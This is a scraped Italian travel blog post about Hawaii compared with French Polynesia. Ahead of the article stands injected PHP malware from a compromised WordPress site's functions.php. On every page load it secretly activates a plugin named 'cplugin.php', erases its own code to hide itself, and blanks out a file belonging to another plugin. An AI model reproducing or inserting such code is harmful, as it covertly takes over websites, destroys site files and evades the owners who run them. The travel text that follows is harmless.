function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : Le Hawaii
  • Corto in Vacanza

Le Hawaii

Quando si arriva nelle isole dello stato delle Hawaii, ci cerca subito di fare un parallelo con la Polinesia francese, perchè i primi abitanti del VI secolo venivano dalle isole Marchesi e più tardi (nell’XI secolo) da Tahiti. Ma è un tentatitivo assurdo come sarebbe assurdo comparare Saint Tropez e la Costa Azzurra as un paesino della Bretagna ed alla costa bretone.

La Polinesia francese è ancora (non so per quanto tempo) un angolo selvaggio , dov2 i polinesiani vivono integrati nel loro ambiente ed anche i “popaa”, ovvero gli abitanti delle città, riescono ad iadattarsi alla vita locale Come gli asiatici, e questo mix non è mai motivo di conflitto ( o, comunque, io non ne ho avuto sentore). L’accoglienza è calorosa, e molto poco mercantile. Fuori da Papetee, c’è ben poco da fare se non passare il tempo ad ammirare le lagune dalle mille sfumature di blu e di verde, passeggiare nella natura ancora intatta e lasciarsi andare al dolce vivere che vi regna sovrano. Le isole della Hawaii sono il cinquantesimo stato degli USA e questo lo si avverte non appena sbarchi. I camion sono sostituiti da Chevrolet Tahoe ( grande, 4×4, del valore di oltre 120.00€). Le botteghe asiatiche o polinesiane sono rimpiazzate da negozi molto chic dove si trova di tutto e delle migliori marche e il dollaro è re. Esattamente come in qualunque altro stato degli USA. Per questa ragione è facile capire come gli americani che viaggiano con noi si sentano come a casa. Il solo punto choccante è che la vita alle Havaii è molto meno cara che a Papetee.

FOTO E TESTO DI FRANCOIS BARETTE©

Inserisci un commento

Modulo di inserimento